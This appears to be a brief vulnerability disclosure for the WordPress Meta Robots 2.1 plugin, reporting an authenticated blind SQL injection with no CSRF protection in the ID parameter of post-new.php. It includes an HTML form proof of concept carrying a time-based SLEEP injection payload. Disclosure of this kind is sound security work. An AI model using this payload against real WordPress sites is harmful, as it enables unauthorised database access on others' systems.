Hello,

Plugin: WordPress Meta Robots 2.1 https://wordpress.org/plugins/wordpress-meta-robots/

1. Blind SQL injection

Authenticated users (like editors) can execute arbitrary SQL commands (there is no CSRF protection)

Method: POST

Url: http://localhost/wp-admin/post-new.php

Vulnerable parameter: ID

Example PHP callstack:

wp_meta_robots_plugin::meta_robots_insert_post   [/tmp/wpplugin/wordpress-meta-robots/wp-meta-robots.php:23]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/post-new.php">

<input type="text" name="ID" value="-1 or (SELECT * FROM (SELECT SLEEP(10))XX)" />

<input type="submit">

</form>

--